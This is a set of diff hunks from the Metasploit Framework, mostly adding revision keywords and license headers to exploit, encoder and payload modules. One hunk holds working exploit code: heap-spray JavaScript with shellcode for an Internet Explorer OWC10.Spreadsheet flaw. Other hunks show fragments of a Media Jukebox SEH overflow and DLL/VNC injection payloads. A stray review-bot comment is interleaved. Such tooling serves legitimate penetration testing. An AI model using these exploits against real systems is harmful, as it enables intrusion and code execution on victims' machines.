results.each_key do |entry|
n_add = []
n_sub = []
# Look for additional entries in the target NS
if(results[entry][:targ])
results[entry][:targ].each_key do |rtype|
results[entry][:targ].each_key do |rtype|
if(not results[entry][:base] or not results[entry][:base][rtype])
results[entry][:targ][rtype].sort.each do |ref|
n_sub << (" + #{entry} #{rtype} #{ref}")
@@ -137,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
if (results[entry][:base])
results[entry][:base].each_key do |rtype|
@@ -160,15 +170,15 @@ class Metasploit3 < Msf::Auxiliary
if(not results[entry][:base][rtype].include?(ref))
n_add << (" + #{entry} #{rtype} #{ref}")
end
end
end
end
end
end
n_sub.each {|s| print_status(s) }
n_add.each {|s| print_status(s) }
end
end
end
end
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0870' ],
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision:$',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2006-2081' ],
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -15,10 +19,9 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => ' DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution',
'Description' => %q{
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
any user with create session privilege to grant themselves java IO privileges.
Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only)
},
'Author' => [ 'sid[at]notsosecure.com' ],
'License' => MSF_LICENSE,
@@ -30,10 +33,10 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Feb 1 2010'))
register_options(
[
OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
], self.class)
register_options(
[
OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
], self.class)
end
def run
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -16,9 +20,8 @@ class Metasploit3 < Msf::Auxiliary
'Name' => ' DBMS_JVM_EXP_PERMS 11g R1/R2 OS Code Execution',
'Description' => %q{
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
any user with create session privilege to grant themselves java IO privileges.
any user with create session privilege to grant themselves java IO privileges.
Identified by David Litchfield. Works on 11g R1 and R2 (Windows only).
},
'Author' => [ 'sid[at]notsosecure.com' ],
'License' => MSF_LICENSE,
@@ -30,10 +33,10 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Feb 1 2010'))
register_options(
[
OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
], self.class)
register_options(
[
OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
], self.class)
end
def run
+2 -6
@@ -9,13 +9,10 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/encoder/alpha2/alpha_mixed'
class Metasploit3 < Msf::Encoder::Alphanum
Rank = LowRanking
def initialize
@@ -64,7 +61,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
buf + Rex::Encoder::Alpha2::AlphaMixed::gen_decoder(reg, off)
end
#
# Configure SEH getpc code on Windows
#
@@ -73,7 +70,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
datastore['AllowWin32SEH'] = true
end
end
#
# Encodes a one byte block with the current index of the length of the
# payload.
@@ -89,4 +86,3 @@ class Metasploit3 < Msf::Encoder::Alphanum
state.encoded += Rex::Encoder::Alpha2::AlphaMixed::add_terminator()
end
end
@@ -23,11 +23,11 @@ class Metasploit3 < Msf::Exploit::Remote
This module harnesses Maple's ability to create files and execute commands
automatically when opening a Maplet. All versions up to 13 are suspected
vulnerable. Testing was conducted with version 13 on Windows. Standard security
settings prevent code from running in a normal maple worksheet without user
settings prevent code from running in a normal maple worksheet without user
interaction, but those setting do not prevent code in a Maplet from running.
In order for the payload to be executed, an attacker must convince someone to
open a specially modified .maplet file with Maple. By doing so, an attacker can
open a specially modified .maplet file with Maple. By doing so, an attacker can
execute arbitrary code as the victim user.
},
'License' => MSF_LICENSE,
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
fname << ".exe"
end
fhandle = rand_text_alpha(3+rand(15))
#Write maple commands to create executable
content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"
exe = binary.unpack('C*')
@@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
specifiers, an attacker can corrupt memory and execute arbitrary code.
},
'Author' => [ 'jduck' ],
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '11805'],
@@ -1,5 +1,5 @@
##
# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $
# $Id$
##
##
@@ -9,7 +9,6 @@
# http://metasploit.com/framework/
##
require 'msf/core'
#require 'racket'
@@ -48,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
'redsand' # windows target/testing
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8364 $',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0304' ],
@@ -19,6 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',
# Description?
# Author?
'Version' => '$Revision$',
'Platform' => 'osx',
'References' =>
[
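Review bot: The two added placeholder comments `# Description?` and `# Author?` leave the module's info hash without a 'Description' or 'Author' entry, which is the documentation the framework surfaces to users; since this hunk is already adding `'Version' => '$Revision$'` to the same hash, these should be filled in rather than shipped as comments. A `'Description' => %q{ ... }` entry stating what the RTSP Content-Type overflow affects and an `'Author' => [ ... ]` list would make this module consistent with the other modules in this commit (for example the Energizer DUO and DNS Lookup Result Comparison modules), which carry both keys. If the author and description are genuinely unknown, a `# TODO:` tag with a tracking reference is clearer than bare question marks. The initialize method and the surrounding info hash continue outside the hunk.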
@@ -1,7 +1,16 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
},
'Platform' => [ 'unix', 'win', 'linux' ],
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
@@ -81,6 +81,6 @@ class Metasploit3 < Msf::Exploit::Remote
req2 = send_request_raw({
'uri' => datastore['URIOUT'],
}, 25)
end
end
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@@ -18,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Energizer DUO Trojan Code Execution',
'Description' => %q{
This module will execute an arbitrary payload against
any system infected with the Arugizer trojan horse. This
backdoor was shipped with the software package accompanying
the Energizer Duo USB battery charger.
This module will execute an arbitrary payload against
any system infected with the Arugizer trojan horse. This
backdoor was shipped with the software package accompanying
the Energizer Duo USB battery charger.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@@ -1,9 +1,13 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
@@ -18,17 +22,17 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Adobe JBIG2Decode Memory Corruption Exploit',
'Description' => %q{
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
This module relies upon javascript for the heap spray.
This module relies upon javascript for the heap spray.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Metasploit implementation
'natron',
# bl4cksecurity blog explanation of vuln [see References]
'xort', 'redsand',
# obfuscation techniques and pdf template from util_printf
'MC', 'Didier Stevens <didier.stevens[at]gmail.com>',
# Metasploit implementation
'natron',
# bl4cksecurity blog explanation of vuln [see References]
'xort', 'redsand',
# obfuscation techniques and pdf template from util_printf
'MC', 'Didier Stevens <didier.stevens[at]gmail.com>',
],
'Version' => '$Revision$',
'References' =>
@@ -54,7 +58,6 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Feb 2009',
'DefaultTarget' => 0))
end
def autofilter
@@ -1,9 +1,13 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
@@ -18,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Adobe util.printf() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional
< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
entry, an attacker may be able to execute arbitrary code.
< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
entry, an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>' ],
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'MSB', 'MS09-043' ],
[ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
@@ -43,17 +43,17 @@ class Metasploit3 < Msf::Exploit::Remote
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'BadChars' => '',
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Jul 13 2009',
'DefaultTarget' => 0))
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
end
@@ -68,45 +68,45 @@ class Metasploit3 < Msf::Exploit::Remote
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
shellcode = Rex::Text.to_unescape(p.encoded)
retaddr = Rex::Text.to_unescape([target.ret].pack('V'))
js = %Q|
var xshellcode = unescape("#{shellcode}");
var xarray = new Array();
var xls = 0x81000-(xshellcode.length*2);
var xbigblock = unescape("#{retaddr}");
while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
var xlh = xbigblock.substring(0, xls / 2);
delete xbigblock;
for(xi=0; xi<0x99*2; xi++) {
xarray[xi] = xlh + xlh + xshellcode;
}
CollectGarbage();
var xobj = new ActiveXObject("OWC10.Spreadsheet");
xe = new Array();
xe.push(1);
xe.push(2);
xe.push(0);
xe.push(window);
for(xi=0; xi < xe.length; xi++){
for(xj=0; xj<10; xj++){
try { xobj.Evaluate(xe[xi]); } catch(e) { }
}
}
window.status = xe[3] + '';
for(xj=0; xj<10; xj++){
try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
}
@@ -118,14 +118,14 @@ class Metasploit3 < Msf::Exploit::Remote
'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj}
}
).to_s
# Encode the javascript payload with the URI key
# js = encrypt_js(js, @javascript_encode_key)
# Fire off the page to the client
send_response(cli, "<html><script language='javascript'>#{js}</script></html>")
# Handle the payload
handler(cli)
end
@@ -1,5 +1,5 @@
##
# $id$
# $Id$
##
##
@@ -1,9 +1,13 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -17,9 +21,9 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
'Description' => %q{
This module exploits a stack overflow in Media Jukebox 8.0.400
By creating a specially crafted m3u or pls file, an an attacker may be able
to execute arbitrary code.
This module exploits a stack overflow in Media Jukebox 8.0.400
By creating a specially crafted m3u or pls file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
@@ -70,4 +74,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
# direct ret overwrite at offset 1024
# nseh overwrite at offset 1040
ret_offset = 1024
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub).encode_string
m3u[seh_offset - stub.length, stub.length] = stub
# Jump back to the stub
jmp2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + stub.length.to_s).encode_string
seh = ''
@@ -52,6 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'jduck' # metasploit module
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '62163' ],
@@ -26,6 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
long JSESSION cookie value can lead to arbirtary code execution.
},
'Author' => 'pusscat',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-5457' ],
@@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
You may have to run this twice due to timing issues with handlers.
},
'Author' => 'pusscat',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-4008' ],
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-4178' ],
@@ -45,6 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Trancer <mtrancer[at]gmail.com>', # Metasploit implementation
'jduck'
],
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.pank4j.com/exploits/httpdxb0f.php' ],
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'jduck' # original discovery and metasploit module
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '60182' ]
+11 -1
@@ -1,5 +1,15 @@
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
###
# Linux Chmod(file, mode)
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
###
#
# Exec
-2
@@ -9,11 +9,9 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/payload/windows/exec'
###
#
# Executes a command on the target machine
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
+4
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -9,11 +9,9 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/payload/osx/bundleinject'
###
#
# Injects an arbitrary DLL in the exploited process.
+11 -2
@@ -1,9 +1,19 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# Copyright (c) 2008 Stephen Fewer of Harmony Security (www.harmonysecurity.com)
require 'msf/core'
require 'msf/core/payload/windows/reflectivedllinject'
###
#
# Injects an arbitrary DLL in the exploited process via a reflective loader.
@@ -14,4 +24,3 @@ module Metasploit3
include Msf::Payload::Windows::ReflectiveDllInject
end
@@ -9,11 +9,9 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/payload/windows/dllinject'
###
#
# Injects an arbitrary DLL in the exploited process.
@@ -23,4 +21,4 @@ module Metasploit3
include Msf::Payload::Windows::DllInject
end
end
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# Copyright (c) 2008 Stephen Fewer of Harmony Security (www.harmonysecurity.com)
require 'msf/core'
@@ -21,7 +21,7 @@ require 'msf/base/sessions/vncinject'
module Metasploit3
include Msf::Payload::Windows::ReflectiveDllInject_x64
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows x64 VNC Server (Reflective Injection)',
@@ -29,7 +29,7 @@ module Metasploit3
'Description' => 'Inject a VNC Dll via a reflective loader (Windows x64) (staged)',
'Author' => [ 'sf' ],
'Session' => Msf::Sessions::VncInject ))
# Override the DLL path with the path to the meterpreter server DLL
register_options(
@@ -85,9 +85,9 @@ module Metasploit3
flags = 0
flags |= 1 if (datastore['DisableCourtesyShell'])
flags |= 2 if (datastore['DisableSessionTracking'])
# Transmit the one byte flag
session.rstream.put([ flags ].pack('C'))
@@ -104,7 +104,7 @@ module Metasploit3
print_status("Launched vnciewer in the background.")
end
end
super
end
